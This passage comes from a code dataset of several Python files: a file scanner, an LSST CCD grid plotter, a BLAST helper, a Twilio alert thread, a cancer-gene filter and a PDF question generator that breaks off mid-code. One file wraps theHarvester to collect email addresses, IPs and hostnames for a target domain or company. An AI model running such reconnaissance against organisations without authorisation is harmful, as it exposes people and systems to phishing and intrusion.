Select a file or directory with a suffix of %s\" % \",\".join(scanner_file_suffix))\n raise Exception(err_info)\n self.file_queue.put(self.path)\n \n self.__start_threads()\n \n for thread in self.thread_list:\n thread.join()\n\n self.__print__()\n\n def __get_scanner_file__(self,scanner_dir,file_suffix):\n dir_or_files = os.listdir(scanner_dir)\n for dir_file in dir_or_files:\n dir_file_path = os.path.join(scanner_dir,dir_file)\n if os.path.isdir(dir_file_path):\n self.__get_scanner_file__(dir_file_path,file_suffix)\n else:\n if len(dir_file.split(\".\"))>1:\n if dir_file.split(\".\")[-1] in file_suffix: # use the last suffix so names with extra dots still match\n self.file_queue.put(dir_file_path)\n \n def __print__(self):\n print(\"=========The result set for the static scan is shown below:===============\")\n with open(cores.result_path,\"a+\") as f:\n for key,value in self.result_dict.items():\n f.write(key+\"\\r\")\n for result in value:\n if result in self.value_list:\n continue\n self.value_list.append(result)\n print(result)\n f.write(\"\\t\"+result+\"\\r\")\n print(\"For more information about the search, see: %s\" %(cores.result_path))\n\n def __start_threads(self):\n for threadID in range(1, self.threads + 1): # spawn exactly self.threads workers\n name = \"Thread - \" + str(threadID)\n thread = ParsesThreads(threadID,name,self.file_queue,self.all,self.result_dict)\n thread.start()\n self.thread_list.append(thread)","sub_path":"libs/task/web_task.py","file_name":"web_task.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"201670362","text":"# -*- coding: utf-8 -*-\n\nfrom salver.facts import IPv4, Email, Domain, Company\nfrom salver.common.utils import get_actual_dir\nfrom salver.common.collectors import DockerCollector\n\n\nclass TheHarester(DockerCollector):\n config = {\n 'name': 'harvester',\n 'docker': {'build_context': get_actual_dir()},\n }\n\n def callbacks(self):\n return {\n Domain: self.from_domain,\n Company: self.from_company,\n }\n\n def from_company(self, company):\n yield from self.scan(company.name)\n\n def from_domain(self, domain):\n yield from self.scan(domain.fqdn)\n\n def scan(self, target):\n data = self.run_container(\n command=[\n '-d',\n target,\n '--source',\n 'baidu,bing,bufferoverun,certspotter,crtsh,dnsdumpster,duckduckgo,\\\n exalead,google,linkedin,linkedin_links,netcraft,\\\n omnisint,otx,qwant,rapiddns,threatminer,twitter,urlscan,yahoo',\n ],\n )\n\n for item, _ in self.findall_regex(\n data,\n r'\\[\\*\\] IPs found: \\d+\\n-------------------\\\n \\n((.|\\n)*)\\n\\[\\*\\] Emails found',\n ):\n for ip in item.split('\\n'):\n if ip:\n yield IPv4(address=ip)\n\n for item, _ in self.findall_regex(\n data,\n r'\\[\\*\\] Emails found: \\d+\\n----------------------\\n((.|\\n)*)\\n\\[\\*\\] Hosts found',\n ):\n for email in item.split('\\n'):\n if email:\n yield Email(address=email)\n\n for item, _ in self.findall_regex(\n data,\n r'\\[\\*\\] Hosts found: \\d+\\n---------------------\\n((.|\\n)*)',\n ):\n for host in item.split('\\n'):\n if not host:\n continue\n if ':' in host:\n domain, ip = host.split(':')\n yield Domain(fqdn=domain, address=ip)\n yield IPv4(address=ip, dns=domain)\n else:\n yield Domain(fqdn=host)\n","sub_path":"salver/agent/collectors/harvester/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"375274402","text":"import argparse\nimport numpy as np\nimport math\nimport pandas\nfrom bokeh.plotting 
import curdoc, output_file, save, reset_output, figure\nfrom bokeh.layouts import row, column, layout\nfrom bokeh.models import ColumnDataSource, DataTable, TableColumn, NumberFormatter, HTMLTemplateFormatter\n\n\nprint(\"in main\")\n\nparser = argparse.ArgumentParser(\n description='Examine CCD spot images to look at spacing')\n\n# The following are 'convenience options' which could also be specified in\n# the filter string\n\nparser.add_argument('-o', '--output', default='/Users/richard/LSST/Code/misc/CCD_grids/',\n help=\"output directory path\")\nparser.add_argument('--in_params', default='CCD_grids_params.csv',\n help=\"output params file spec\")\nparser.add_argument('-i', '--invert', default='no',\n help=\"invert sensor order\")\nparser.add_argument('-u', '--url_base', default='http://slac.stanford.edu/~richard/LSST/CCD_grids/',\n help=\"base html path\")\n\nargs = parser.parse_args()\n\ncsv_assign = pandas.read_csv(args.in_params, header=0, skipinitialspace=True)\nprint(\"csv read in: \", args.in_params)\ncombos_frame = csv_assign.set_index('name', drop=False)\nid_col = combos_frame[\"name\"]\n\nnames = []\norient = []\nx = [] # for the table\ny = [] # for the table\nsdiff = []\nfx = []\nfy = []\nftheta = []\nst_name = []\n\n# load up the parameters\n\nfor index, c_row in csv_assign.iterrows():\n names.append(c_row[\"name\"])\n orient.append(c_row[\"orientation\"])\n x.append(c_row[\"dx_line\"])\n y.append(c_row[\"dy_line\"])\n sdiff.append(c_row[\"dtheta_line\"])\n st_name.append(c_row[\"ref_CCD\"])\n fx.append(c_row[\"dx_fit\"])\n fy.append(c_row[\"dy_fit\"])\n ftheta.append(c_row[\"dtheta_fit\"])\n\nprint(\"Found \", len(names), \" good filesets\")\n\nTOOLS = \"pan, wheel_zoom, box_zoom, reset, save\"\n\n# now build the sensor/raft grid\n\nfocal_plane = figure(tools=TOOLS, title=\"Focal plane grid\", x_axis_label='pixels',\n y_axis_label='pixels', height=1000, width=1000)\nd_raft = 12700. # pixels - 127 mm between raft centers - per LCA-13381\nd_sensor = 4225. 
# pixels - 42.25 mm between sensor centers\n\nfor rh in range(0, 5):\n for rv in range(0, 5):\n # suppress the corners\n if (rh == 0 and rv == 0) or (rh == 4 and rv == 0) or (rh == 0 and rv == 4) or (rh == 4 and rv == 4):\n continue\n\n cx_r = (rh-2)*d_raft\n cy_r = (rv-2)*d_raft\n\n focal_plane.rect(x=cx_r, y=cy_r, width=d_raft, height=d_raft, fill_alpha=0.0, line_width=2)\n for sh in range(0, 3):\n for sv in range(0, 3):\n cx_s = cx_r + (sh-1)*d_sensor\n cy_s = cy_r + (sv-1)*d_sensor\n focal_plane.rect(x=cx_s, y=cy_s, width=d_sensor, height=d_sensor, fill_color=\"red\",\n fill_alpha=0.20)\ncx_m = []\ncy_m = []\ndx_m = []\ndy_m = []\n\nfor n in names:\n c_name = n.split(\"_\")\n r0 = c_name[0][-2:]\n s0 = c_name[1][-2:]\n\n cy_0 = -2.5*d_raft + (float(r0[0])+0.5)*d_raft + (float(s0[0]) - 1.)*d_sensor\n cx_0 = -2.5*d_raft + (float(r0[1])+0.5)*d_raft + (float(s0[1]) - 1.)*d_sensor\n\n r1 = c_name[2][-2:]\n s1 = c_name[3][-2:]\n cy_1 = -2.5*d_raft + (float(r1[0])+0.5)*d_raft + (float(s1[0]) - 1.)*d_sensor\n cx_1 = -2.5*d_raft + (float(r1[1])+0.5)*d_raft + (float(s1[1]) - 1.)*d_sensor\n\n focal_plane.line([cx_0, cx_1], [cy_0, cy_1], line_color=\"black\", line_width=8)\n\nfocal_plane.circle(x=0., y=0., color=\"green\", size=8)\n\nsensors = [\"R30_S10\", \"R30_S00\", \"R20_S20\", \"R20_S10\", \"R20_S00\", \"R20_S01\", \"R20_S02\",\n \"R20_S12\", \"R20_S22\", \"R30_S02\", \"R30_S12\", \"R30_S22\", \"R30_S21\", \"R30_S20\"]\n\n#sensors = [\"R30_S10\", \"R30_S20\"]\n\n#sensors = [\"R30_S10\", \"R30_S00\", \"R30_S10\", \"R30_S20\"]\n\n#sensors = [\"R30_S10\", \"R30_S00\", \"R20_S20\", \"R20_S10\", \"R20_S00\", \"R20_S10\", \"R20_S20\", \"R30_S00\",\n# \"R30_S10\", \"R30_S20\"]\n\n#sensors = [\"R30_S10\", \"R30_S00\", \"R20_S20\", \"R20_S10\", \"R20_S00\", \"R20_S01\",\n# \"R20_S11\", \"R20_S21\", \"R30_S01\", \"R30_S11\", \"R30_S21\", \"R30_S20\"]\n\n#sensors = [\"R30_S11\", \"R30_S01\", \"R20_S21\", \"R20_S20\", \"R30_S00\", \"R30_S10\", \"R30_S20\", \"R30_S21\"]\n#sensors = [\"R30_S11\", \"R30_S10\", \"R30_S20\", \"R30_S21\"]\n\n#sensors = [\"R30_S21\", \"R30_S22\", \"R30_S21\"]\n\nif args.invert == \"yes\":\n sensors.reverse()\n\nstart_x = 0.\nstart_y = 0.\n\nrunning_x = start_x\nrunning_y = start_y\n\nprint(sensors[-1], 0., 0.)\nrot_angle = 0\ncur_sensor = sensors[-1] # assumes this is a loop with the starting point == ending point\n\nr0 = cur_sensor[0:3]\ns0 = cur_sensor[4:7]\n\ncy_0 = -2.5 * d_raft + (float(r0[1]) + 0.5) * d_raft + (float(s0[1]) - 1.) * d_sensor\ncx_0 = -2.5 * d_raft + (float(r0[2]) + 0.5) * d_raft + (float(s0[2]) - 1.) * d_sensor\n\norientation = \"\"\n\n# find the proper connecting measurement given the current sensor and standard\nfor ids, tgt_sensor in enumerate(sensors):\n idl = 0\n # find the connecting measurement for target and current sensor. idl is index into arrays.\n for ic, c in enumerate(names):\n if tgt_sensor in c:\n if cur_sensor in c:\n idl = ic\n break\n\n std_sign = 1. # account for direction between standard and target\n if tgt_sensor != st_name[idl]:\n std_sign = -1.\n\n dx0 = -x[idl] * std_sign\n dy0 = -y[idl] * std_sign\n\n dx = dx0 * math.cos(rot_angle) - dy0 * math.sin(rot_angle)\n dy = dx0 * math.sin(rot_angle) + dy0 * math.cos(rot_angle)\n\n # apply rotation to the deltas, but only after the first connection\n\n rot_angle -= std_sign*sdiff[idl]\n\n r0 = tgt_sensor[0:3]\n s0 = tgt_sensor[4:7]\n\n cy_m.append(-2.5 * d_raft + (float(r0[1]) + 0.5) * d_raft + (float(s0[1]) - 1.) 
* d_sensor)\n cx_m.append(-2.5 * d_raft + (float(r0[2]) + 0.5) * d_raft + (float(s0[2]) - 1.) * d_sensor)\n\n focal_plane.line([cx_0, dx + cx_0],\n [cy_0, dy + cy_0],\n line_color=\"red\", line_width=2)\n\n cx_0 += dx\n cy_0 += dy\n\n running_x += dx\n running_y += dy\n\n dx_m.append(cx_0 - cx_m[ids])\n dy_m.append(cy_0 - cy_m[ids])\n dist_m = math.hypot(cx_0 - cx_m[ids], cy_0 - cy_m[ids])\n\n print(tgt_sensor, names[idl], running_x, running_y, \" \",\n st_name[idl], std_sign, sdiff[idl], rot_angle, orient[idl], dx, dx0, dy, dy0, dx_m[ids], dy_m[ids], dist_m)\n\n cur_sensor = tgt_sensor\n\nfx = figure(tools=TOOLS, title=\"x diffs to centers\", x_axis_label='sensor count',\n y_axis_label='pixels')\nfy = figure(tools=TOOLS, title=\"y diffs to centers\", x_axis_label='sensor count',\n y_axis_label='pixels')\n\nfx.vbar(top=dx_m, x=range(len(dx_m)), width=1, fill_color='red', fill_alpha=0.2)\nfy.vbar(top=dy_m, x=range(len(dy_m)), width=1, fill_color='red', fill_alpha=0.2)\n\nout_lay = layout(focal_plane, row(fx, fy))\n\noutput_file(args.output + \"CCD_locations.html\")\nsave(out_lay, title=\"CCD grid locations\")\n","sub_path":"python/run_ccd_locations.py","file_name":"run_ccd_locations.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"511748033","text":"import os\nimport uuid\n\nfrom Bio.Blast import NCBIWWW\n\nfrom blast_local.utils import BLAST\n\n\nclass BLASTNcbi(BLAST):\n \"\"\"\n Class to handle duties related to blast against sequences in NCBI Genbank.\n \"\"\"\n def __init__(self, voucher_code, gene_code):\n self.voucher_code = voucher_code\n self.gene_code = gene_code\n self.e_value = 0.001\n self.cwd = os.path.dirname(__file__)\n self.query_file = os.path.join(self.cwd,\n 'db',\n 'query_' + uuid.uuid4().hex + '.fas',\n )\n self.output_file = os.path.join(self.cwd,\n 'db',\n 'output_' + uuid.uuid4().hex + '.xml',\n )\n\n def do_blast(self):\n \"\"\"\n Does a blast against NCBI and saves returned XML file to local disk.\n \"\"\"\n with open(self.query_file) as handle:\n fasta_string = handle.read()\n\n result_handle = NCBIWWW.qblast('blastn', 'nt', fasta_string)\n\n with open(self.output_file, 'w') as writer:\n writer.write(result_handle.read())\n result_handle.close()\n","sub_path":"voseq/blast_ncbi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"634304771","text":"\"\"\"\nnotificationthread.py - Handles the transmission of alerts to subscribers.\n\"\"\"\n__version__ = \"0.0.1\"\n__author__ = \"Thomas J. Daley, J.D.\"\n__date__ = \"13 SEP 2017\"\n\nimport logging\nfrom threading import Thread\n\nfrom twilio.rest import Client\n\nfrom cloudlib.conf import Config\n\nclass NotificationThread(Thread):\n \"\"\"\n This class queues notifications either through SMTP or TWILIO.\n \"\"\"\n def __init__(self, queue):\n ''' Initialize this thread. '''\n Thread.__init__(self)\n self.queue = queue\n self.logger = logging.getLogger(\"sb.cloud.noxT\")\n\n account_sid = Config.TWILIO_ACCOUNT_SID\n auth_token = Config.TWILIO_AUTH_TOKEN\n self.sms_client = Client(account_sid, auth_token)\n self.from_number = Config.TWILIO_FROM_NUMBER\n\n\n def run(self):\n ''' Retrieve items and send them to subscribers. 
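Runs forever, blocking on the queue until the next alert arrives.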
'''\n while True:\n queued_alert = self.queue.get()\n self.logger.debug(\"Dequeued alert %d\", queued_alert.item_id)\n for subscriber in queued_alert.subscribers:\n if subscriber.is_ok_to_send_sms(queued_alert.alert.type_value):\n try:\n # If we have both a preview and a full URL, then transmit\n # the alert as MMS with both URLs.\n if queued_alert.full_url and queued_alert.preview_url:\n self.sms_client.messages.create(\n to=subscriber.mobile_number,\n from_=self.from_number,\n body=queued_alert.alert.sms_message() + \\\n \"\\r\\n\" + queued_alert.full_url,\n media_url=queued_alert.preview_url)\n\n # If all we have is the thumbnail, then transmit an MMS\n # with the thumbnail image, but no link to the full image.\n elif queued_alert.preview_url:\n self.sms_client.messages.create(\n to=subscriber.mobile_number,\n from_=self.from_number,\n body=queued_alert.alert.sms_message(),\n media_url=queued_alert.preview_url)\n\n # If all we have is a URL to the full image, then transmit\n # an SMS message with the message and the link to the full\n # image, but not MMS with a thumbnail.\n elif queued_alert.full_url:\n self.sms_client.messages.create(\n to=subscriber.mobile_number,\n from_=self.from_number,\n body=queued_alert.alert.sms_message() + \\\n \"\\r\\n\" + queued_alert.full_url)\n\n # Finally, if we have no URLs, then just send an SMS with\n # the text of the message.\n else:\n self.sms_client.messages.create(\n to=subscriber.mobile_number,\n from_=self.from_number,\n body=queued_alert.alert.sms_message())\n\n subscriber.set_last_sms_time(queued_alert.alert.type_value)\n # pylint: disable=W0703,C0103\n # Catching a general exception b/c the Twilio API is not clear\n # as to what exceptions can be thrown here. /tjd/\n except Exception as e:\n self.logger.error(\"Unable to send SMS to %s: %s\",\n subscriber.mobile_number, e)\n\n if subscriber.is_ok_to_send_email(queued_alert.alert.type_value):\n try:\n self.logger.debug(\n \"Would send email to %s (%s)\",\n subscriber.email,\n subscriber.get_last_email_sent_time(queued_alert.alert.type_value))\n subscriber.set_last_email_time(queued_alert.alert.type_value)\n # pylint: disable=W0703,C0103\n # Catching a general exception b/c I don't know what exceptions\n # can be thrown here. 
/tjd/\n except Exception as e:\n self.logger.error(\"Unable to send email to %s: %s\", subscriber.email, e)\n\n self.queue.task_done()\n","sub_path":"cloudlib/notificationthread.py","file_name":"notificationthread.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"176101953","text":"def CancerGene(inF):\n D = {}\n inFile = open('/mnt/larsix/projects/NMD/hansun/Data/COSMIC/COSMIC_CancerGene_Census.txt')\n head = inFile.readline()\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n D[fields[0]] = 1\n inFile.close()\n\n inFile = open(inF)\n ouFile = open(inF + '_CancerGene', 'w')\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n genes = fields[0].split(':')\n if genes[0] in D or genes[1] in D:\n ouFile.write(line + '\\n')\n inFile.close()\n ouFile.close()\n\nCancerGene('TCGA_IntergenicRegion_Table_TopN7_NumTumor7_HighExp')\n","sub_path":"lincRNAs/IntergenicRegions/TumorVsAdjacent/09-CancerGene.py","file_name":"09-CancerGene.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"492102342","text":"import streamlit as st\nimport re\nimport torch\nfrom transformers import AutoModelForTokenClassification, AutoTokenizer, AutoModelWithLMHead\nimport spacy \nimport en_core_web_sm\nimport fitz\nfrom operator import itemgetter\nimport copy\nimport base64\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\ndef bimg2utf(bimg):\n return base64.b64encode(bimg).decode('utf8')\n\nMAX_LENGTH = int(10000)\ndef adjust_length_to_model(length, max_sequence_length):\n if length < 0 and max_sequence_length > 0:\n length = max_sequence_length\n elif 0 < max_sequence_length < length:\n length = max_sequence_length # No generation bigger than model size\n elif length < 0:\n length = MAX_LENGTH # avoid infinite loop\n return length\n\n@st.cache\ndef generate_questions(answers, context, max_length=64):\n tokenizer = AutoTokenizer.from_pretrained(\"mrm8488/t5-base-finetuned-question-generation-ap\")\n model = AutoModelWithLMHead.from_pretrained(\"mrm8488/t5-base-finetuned-question-generation-ap\")\n model.to(device)\n \n qa_pairs = []\n for answer in answers:\n input_text = \"answer: %s context: %s </s>\" % (answer, context)\n\n features = tokenizer([input_text], return_tensors='pt')\n output = model.generate(input_ids=features['input_ids'].to(device), \n attention_mask=features['attention_mask'].to(device),\n max_length=max_length)\n question = tokenizer.decode(output[0])[10:]\n qa_pairs.append((question, answer))\n\n return qa_pairs\n\ndef unique(sequence):\n seen = set()\n return [x for x in sequence if not (x in seen or seen.add(x))]\n\n@st.cache\ndef generate_keywords(text):\n \n nlp = en_core_web_sm.load()\n doc = nlp(text)\n words = [str(x) for x in doc]\n labels = [str(x.ent_type_) for x in doc]\n ents, names = [], []\n for i, (word, label) in enumerate(zip(words, labels)):\n if label == '':\n continue\n elif i > 0 and labels[i]==labels[i-1]: # only merge with a previous token; never wrap around to the last one\n ents[-1]+=' '+word\n else:\n ents.append(word)\n names.append(label)\n return unique(ents)\n\n\n\ndef _fonts(doc, granularity=True):\n \"\"\"Extracts fonts and their usage in PDF documents.\n :param doc: PDF document to iterate through\n :type doc: <class 'fitz.fitz.Document'>\n :param granularity: also use 'font', 'flags' and 'color' to discriminate text\n :type granularity: bool\n :rtype: [(font_size, count), (font_size, count)], 
dict\n :return: most used fonts sorted by count, font style information\n \"\"\"\n styles = {}\n font_counts = {}\n\n for page in doc:\n blocks = page.getText(\"dict\")[\"blocks\"]\n for b in blocks: # iterate through the text blocks\n if b['type'] == 0: # block contains text\n for l in b[\"lines\"]: # iterate through the text lines\n for s in l[\"spans\"]: # iterate through the text spans\n if granularity:\n identifier = \"{0}_{1}_{2}_{3}\".format(s['size'], s['flags'], s['font'], s['color'])\n styles[identifier] = {'size': s['size'], 'flags': s['flags'], 'font': s['font'],\n 'color': s['color']}\n else:\n identifier = \"{0}\".format(s['size'])\n styles[identifier] = {'size': s['size'], 'font': s['font']}\n\n font_counts[identifier] = font_counts.get(identifier, 0) + 1 # count the fonts usage\n\n font_counts = sorted(font_counts.items(), key=itemgetter(1), reverse=True)\n\n if len(font_counts) < 1:\n raise ValueError(\"Zero discriminating fonts found!\")\n\n return font_counts, styles\n\ndef _font_tags(font_counts, styles):\n \"\"\"Returns dictionary with font sizes as keys and tags as value.\n :param font_counts: (font_size, count) for all fonts occuring in document\n :type font_counts: list\n :param styles: all styles found in the document\n :type styles: dict\n :rtype: dict\n :return: all element tags based on font-sizes\n \"\"\"\n p_style = styles[font_counts[0][0]] # get style for most used font by count (paragraph)\n p_size = p_style['size'] # get the paragraph's size\n\n # sorting the font sizes high to low, so that we can append the right integer to each tag \n font_sizes = []\n for (font_size, count) in font_counts:\n if re.search('\\_', font_size):\n font_size = font_size.split('_')[0]\n font_sizes.append(float(font_size))\n font_sizes.sort(reverse=True)\n\n # aggregating the tags for each font size\n idx = 0\n size_tag = {}\n for size in font_sizes:\n idx += 1\n if size == p_size:\n idx = 0\n size_tag[size] = '<p>'\n if size > p_size:\n size_tag[size] = '<h{0}>'.format(idx)\n elif size < p_size:\n size_tag[size] = '<s{0}>'.format(idx)\n\n return size_tag\n\ndef _flags_read(flags):\n \"\"\"Make font flags human readable.\"\"\"\n l = []\n\n if flags & 2 ** 4:\n l.append(\"bold\")\n\n if flags & 2 ** 1:\n l.append(\"italic\")\n\n if flags & 2 ** 0:\n l.append(\"superscript\")\n\n# if flags & 2 ** 2:\n# l.append(\"serifed\")\n# else:\n# l.append(\"sans\")\n# if flags & 2 ** 3:\n# l.append(\"monospaced\")\n# else:\n# l.append(\"proportional\")\n return l\n\nclass PDF:\n def __init__(self, granularity=True):\n self.granularity = granularity\n self.font_counts = None\n self.font_styles = None\n self.font_tags = None\n \n\n \n def __call__(self, path):\n \"\"\"Scrapes headers & paragraphs from PDF and return texts with element tags.\n :param doc: PDF document to iterate through\n :type doc: <class 'fitz.fitz.Document'>\n :param self.font_tags: textual element tags for each size\n :type self.font_tags: dict\n :rtype: list\n :return: texts with pre-prended element tags\n \"\"\"\n doc = fitz.open(path)\n self.font_counts, self.font_styles = _fonts(doc)\n self.font_tags = _font_tags(self.font_counts, self.font_styles)\n \n pages = {} # list with headers and paragraphs\n first = True # boolean operator for first header\n previous_s = {} # previous span\n prev_bold = False\n\n for j, page in enumerate(doc):\n blocks = page.getText(\"dict\")[\"blocks\"]\n \n for image_index, img in enumerate(page.getImageList(), start=1):\n # get the XREF of the image\n xref = img[0]\n # extract the image 
bytes\n base_image = doc.extractImage(xref)\n image_bytes = base_image[\"image\"]\n image_ext = base_image[\"ext\"]\n \n if j+1 in pages:\n pages[j+1].append('{}{}'.format('<im>', bimg2utf(image_bytes)))\n else:\n pages[j+1] = ['{}{}'.format('<im>', bimg2utf(image_bytes))]\n \n for b in blocks: # iterate through the text blocks\n if b['type'] == 0: # this block contains text\n block_string = \"\" # text found in block\n for l in b[\"lines\"]: # iterate through the text lines\n span_length = len(l[\"spans\"])\n \n for i, s in enumerate(l[\"spans\"]): # iterate through the text spans\n final_span = i==span_length-1\n \n if s['text'].strip(): # removing whitespaces:\n text = s['text'].strip()\n text_size = s['size']\n text_bold = 'bold' in _flags_read(s['flags'])\n bold_end = False\n \n if first:\n if text_bold and not prev_bold:\n text = '<b>'+text\n if final_span:\n text = text+'</b>'\n bold_end = True\n \n first = False\n block_string = self.font_tags[text_size] + text\n prev_size = text_size\n prev_bold = text_bold if not bold_end else False\n else:\n if text_size == prev_size:\n \n if block_string == \"\" or block_string and all((c == \"|\") for c in block_string):\n # new block or block_string only contains pipes, so append size tag\n if text_bold and not prev_bold:\n text = '<b>'+text\n if final_span:\n text = text+'</b>'\n bold_end = True\n \n block_string = self.font_tags[text_size] + text\n\n else: # in the same block, so concatenate strings\n if text_bold and not prev_bold:\n text = '<b>'+text\n if final_span:\n text = text+'</b>'\n bold_end = True\n elif prev_bold:\n block_string +='</b>'\n bold_end = True\n \n block_string += \" \" + text\n else:\n if text_bold and not prev_bold:\n text = '<b>'+text\n if final_span:\n text = text+'</b>'\n bold_end = True\n \n if len(block_string)>0 and re.search('[a-zA-Z0-9]', block_string):\n if j+1 in pages:\n pages[j+1].append(re.sub(r'\\s+',' ', block_string))\n else:\n pages[j+1] = [re.sub(r'\\s+',' ', block_string)]\n block_string = self.font_tags[text_size] + text\n prev_size = text_size\n prev_bold = text_bold if not bold_end else False\n # new block started, indicating with a pipe\n block_string += \"|\"\n\n if len(block_string)>0 and re.search('[a-zA-Z0-9]', block_string):\n if j+1 in pages:\n pages[j+1].append(re.sub(r'\\s+',' ', block_string))\n else:\n pages[j+1] = [re.sub(r'\\s+',' ', block_string)]\n\n image_list = page.getImageList()\n \n pages_split = {}\n \n for k,content in pages.items():\n pages_split[k] = []\n for line in content:\n if re.search(r'\\.{4}', line):\n pages_split[k] += [line.strip()]\n else:\n tag = re.search('\\<.{1,3}\\>', line).group()\n for split in re.split('\\|{2,10}', line):\n if len(split)>0:\n if re.search(r'(?<=\\>).+', split) is None:\n pages_split[k] += ['{}{}'.format(tag, split.strip())]\n else:\n pages_split[k] += [split.strip()]\n \n return pages_split\n \n\n\nclass TMparser:\n def __init__(self, pages, images=False):\n self.pages = pages\n self.content, self.page_ref = self.aggregate_content(images)\n self.toc = self.get_toc()\n self.sections_clean, self.sections_dirty, self.sections_discard = self.make_sections()\n self.sections_final = self.make_section_nums()\n self.sections_final_cxt = self.make_context(self.sections_final)\n \n def get_page(self, num):\n assert num in self.page_ref\n start, end = self.page_ref[num]\n return self.content[start:end]\n \n def get_section(self, num, stype='clean'):\n if stype=='clean':\n title = list(self.sections_clean.keys())[num]\n return title, 
self.sections_clean[title]\n elif stype=='dirty':\n title = list(self.sections_dirty.keys())[num]\n return title, self.sections_dirty[title]\n elif stype=='discard':\n title = list(self.sections_discard.keys())[num]\n return title, self.sections_discard[title]\n \n def aggregate_content(self, images):\n content = []\n page_ref = {}\n \n for k,v in self.pages.items():\n start = len(content)\n if images:\n content+=v\n else:\n content+=[x for x in v if not x.startswith('<im>')]\n end = len(content)\n page_ref[k] = (start, end)\n return content, page_ref\n \n def get_toc(self):\n toc_raw = []\n num = ''\n \n for i, line in enumerate(self.content):\n prev_line = self.content[i-1] if i>0 else ''\n next_line = self.content[i+1] if i<len(self.content)-1 else ''\n \n line = re.sub(r'\\<b\\>|\\<\\/b\\>', '', re.sub('\\|+', '|', re.search(r'(?<=\\>).+', line).group()))\n \n if re.search(r'^[a-zA-Z]+\\s[0-9]+[^\\.\\,0-9]+$|^[0-9]+\\s[a-zA-Z]+[^\\.\\,0-9]+$', line) and (\n re.search(r'\\.{4}', prev_line) or \n re.search(r'\\.{4}', next_line)):\n num = re.search(r'[0-9]+', line).group()\n print(line, num)\n \n if re.search(r'\\.{4}', line) is not None:\n if re.search('^[0-9]', line) is None:\n line = '{} {}'.format(num, line)\n if len(re.findall(r'\\.{4}[a-zA-Z0-9\\s\\-\\–\\(\\)]', line))>1:\n toc_raw += re.split(r'(?<=[0-9]\\|)\\s', line)\n else:\n toc_raw.append(line)\n\n toc = []\n for line in toc_raw:\n renum = re.search(r'^[0-9\\.\\-\\–]*(?=\\s)', line)\n num = '' if renum is None else renum.group().strip()\n name = re.search(r'(?<=^{}).+?(?=\\.\\.\\.)'.format(re.escape(num)), line).group().strip()\n page = re.search(r'(?<=\\.\\.\\.)[^\\.]*[a-zA-Z0-9]+[0-9\\.\\-\\–\\s]{0,5}(?=\\|$)', line).group().strip()\n \n toc.append((num, name, page))\n return toc\n \n def _sections(self):\n sections = []\n start = 0\n\n for section, name, page in self.toc:\n name_tag = re.escape(re.search('.+(?=\\:)|.+(?=\\|)|.+$', name).group())\n\n found_name = False\n for i, line in enumerate(self.content[start:]):\n if re.search(r'\\.{4}', line):\n continue\n \n text_tags = re.findall('(?<=\\<b\\>).+?(?=\\<\\/b\\>)', line)\n text_tags += [re.sub(r'\\<b\\>|\\<\\/b\\>', '', re.search(r'(?<=\\>).+', line).group())]\n \n for text_tag in text_tags:\n if re.search('^[a-zA-Z\\(\\)\\-\\–\\.]{1,4}\\s|^[0-9\\(\\)\\-\\–\\.]{2,6}\\s', text_tag):\n text_tag = re.search('(?<=\\s).*', text_tag).group()\n\n if re.search(r'^{}'.format(name_tag), text_tag):\n found_name = True\n sections.append((i+start, name, line))\n start+=i\n break\n if found_name:\n break\n\n if not found_name and page.isdigit():\n idx1, idx2 = self.page_ref[int(page)]\n name_tag = re.escape(re.search('.+?(?=\\s)|.+$', name).group().lower())\n for j, line in enumerate(self.content[idx1:idx2]):\n text_tag = re.sub(r'\\<b\\>|\\<\\/b\\>', '', re.search(r'(?<=\\>).+', line).group()).lower()\n if re.search(r'{}'.format(name_tag), text_tag):\n found_name = True\n sections.append((j+idx1, name, line))\n break\n if not found_name: \n sections.append((-1, name, -1))\n return sections\n \n def _clean_section(self, section):\n clean, dirty = [], []\n for sec in section:\n sec = re.sub(r'\\uf0a7', '', re.search(r'(?<=\\>).+', sec).group().replace('|', '')).strip()\n numbers = sum(c.isdigit() for c in sec)\n letters = sum(c.isalpha() for c in sec)\n \n if (re.search('^\\<b\\>.+\\<\\/b\\>$', sec) or re.search(r'\\.{4}', sec) \n or letters<=25 or (numbers+10e-5)/(letters+10e-5)>0.3) and not re.search(r'^[a-z]', sec):\n dirty.append(sec)\n else:\n 
clean.append(re.sub(r'\\<b\\>|\\<\\/b\\>', '', sec))\n return clean, dirty\n \n def _super_clean(self, section):\n clean = []\n for sec in section:\n subsec = re.split(r'\\s(?=\\•)', sec) if re.search(r'\\s\\•', sec) else [sec]\n for sub in subsec:\n if re.search(r'^[a-z]', sub) and len(clean)>0:\n clean[-1]+=' {}'.format(sub)\n else:\n clean.append(sub)\n return clean\n \n \n def make_sections(self):\n sections_clean, sections_dirty, section_discard = {}, {}, {}\n \n _sections = [x for x in self._sections() if x[0]>0]\n for i, (idx,name,_) in enumerate(_sections):\n \n idx_next = _sections[i+1][0] if i<len(_sections)-1 else len(self.content)-1\n \n clean, dirty = self._clean_section(self.content[idx:idx_next])\n \n if len(''.join(clean))>100:\n sections_clean[name] = self._super_clean(clean)\n sections_dirty[name] = dirty\n else:\n section_discard[name] = clean+dirty\n \n if idx_next<idx:\n print(name)\n break\n return sections_clean, sections_dirty, section_discard\n \n def make_section_nums(self):\n section_nums = {}\n for x in self.toc:\n if x[1] in section_nums:\n pass\n else:\n section_nums[x[1]] = x[0]\n \n section_nums_clean = {}\n \n for k in self.sections_clean:\n section_nums_clean[k] = section_nums[k].replace('-', '.').strip('.')\n \n all_nums = 